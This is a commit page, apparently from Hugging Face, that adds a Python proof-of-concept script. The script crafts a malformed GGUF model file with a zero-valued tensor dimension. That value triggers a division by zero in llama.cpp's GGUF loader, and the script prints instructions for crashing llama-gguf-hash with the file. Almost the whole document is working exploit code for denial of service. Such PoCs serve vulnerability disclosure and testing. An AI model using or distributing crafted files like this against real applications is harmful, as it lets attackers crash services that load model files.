Zeiyre committed on
Commit
526abd8
·
verified ·
1 Parent(s): 2b77856

Upload llama-cpp/craft_divzero_gguf.py with huggingface_hub

Browse files
Files changed (1) hide show
  1. llama-cpp/craft_divzero_gguf.py +93 -0
llama-cpp/craft_divzero_gguf.py ADDED
@@ -0,0 +1,93 @@
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
1
+ """
2
+ PoC GGUF Generator -- Division by Zero in Tensor Validation
3
+ =============================================================
4
+ Crafts a GGUF file with a zero-valued dimension that triggers
5
+ INT64_MAX / 0 in gguf_init_from_file_impl()'s overflow check.
6
+
7
+ The code validates ne[j] < 0 (rejects negative) but NOT ne[j] == 0.
8
+ With n_dims >= 2 and ne[1] = 0: INT64_MAX / ne[1] = INT64_MAX / 0 -> SIGFPE.
9
+
10
+ Usage:
11
+ python craft_divzero_gguf.py # Generate divzero.gguf
12
+ python craft_divzero_gguf.py -o custom.gguf
13
+
14
+ Then test:
15
+ ./llama-gguf-hash divzero.gguf
16
+ # Expected: Floating point exception (SIGFPE) / crash
17
+ """
18
+
19
+ import argparse
20
+ import struct
21
+
22
GGUF_MAGIC = 0x46554747          # b"GGUF" read as a little-endian uint32
GGUF_VERSION = 3                 # GGUF container format version written to the header
GGUF_DEFAULT_ALIGNMENT = 32      # byte alignment of the tensor-data section
GGUF_TYPE_STRING = 8             # metadata value-type id for a GGUF string (per gguf spec)
GGML_TYPE_F32 = 0                # ggml tensor dtype id for float32 (per ggml enum)
27
+
28
+
29
def write_gguf_string(f, s):
    """Write *s* to *f* in GGUF string layout: uint64 byte length, then UTF-8 bytes."""
    payload = s.encode("utf-8")
    length_prefix = struct.pack("<Q", len(payload))
    f.write(length_prefix)
    f.write(payload)
33
+
34
+
35
def write_kv_string(f, key, value):
    """Write one metadata key/value pair to *f* where the value is a GGUF string.

    Layout: key (GGUF string), uint32 value-type tag, value (GGUF string).
    """
    write_gguf_string(f, key)
    tag = struct.pack("<I", GGUF_TYPE_STRING)
    f.write(tag)
    write_gguf_string(f, value)
39
+
40
+
41
def pad_to_alignment(f, alignment):
    """Zero-pad *f* so its current write position is a multiple of *alignment*.

    No bytes are written when the position is already aligned.
    """
    misalignment = f.tell() % alignment
    if misalignment:
        f.write(bytes(alignment - misalignment))
46
+
47
+
48
def main():
    """Generate the PoC GGUF file.

    Writes a file that is structurally valid through the tensor-info record
    but carries ne[1] = 0; a loader that guards overflow via
    INT64_MAX / ne[j] without first rejecting a zero dimension divides by
    zero when parsing it.
    """
    cli = argparse.ArgumentParser(description="Craft GGUF with division-by-zero PoC")
    cli.add_argument("-o", "--output", default="divzero.gguf", help="Output filename")
    args = cli.parse_args()

    print("Crafting GGUF with zero dimension to trigger INT64_MAX / 0...")
    print(" n_dims = 2, ne[0] = 1, ne[1] = 0")
    print(" Overflow check: INT64_MAX / ne[1] = INT64_MAX / 0 -> SIGFPE")
    print()

    with open(args.output, "wb") as out:
        # Header: magic, version, n_tensors = 1, n_kv = 1.
        # "<IIQQ" packs the four fields back-to-back with no padding,
        # identical to four separate little-endian writes.
        out.write(struct.pack("<IIQQ", GGUF_MAGIC, GGUF_VERSION, 1, 1))

        # Single required metadata entry.
        write_kv_string(out, "general.architecture", "llama")

        # Tensor-info record carrying the malicious zero dimension.
        write_gguf_string(out, "divzero_tensor")
        out.write(struct.pack("<I", 2))              # n_dims = 2
        out.write(struct.pack("<Q", 1))              # ne[0] = 1
        out.write(struct.pack("<Q", 0))              # ne[1] = 0 <-- TRIGGERS DIV BY ZERO
        out.write(struct.pack("<I", GGML_TYPE_F32))  # type = F32
        out.write(struct.pack("<Q", 0))              # offset = 0

        # Tensor data must begin on the default alignment boundary.
        pad_to_alignment(out, GGUF_DEFAULT_ALIGNMENT)

        # Minimal placeholder tensor data (32 zero bytes).
        out.write(bytes(32))

    print(f"Written: {args.output}")
    print()
    print("Test with:")
    print(f" ./llama-gguf-hash {args.output}")
    print(" # Expected: 'Floating point exception' (SIGFPE) or crash")
    print()
    print("Impact: Any application using gguf_init_from_file() to load this")
    print("file will crash. Denial of Service via crafted model file.")
90
+
91
+
92
# Script entry point: generate the PoC file when run directly.
if __name__ == "__main__":
    main()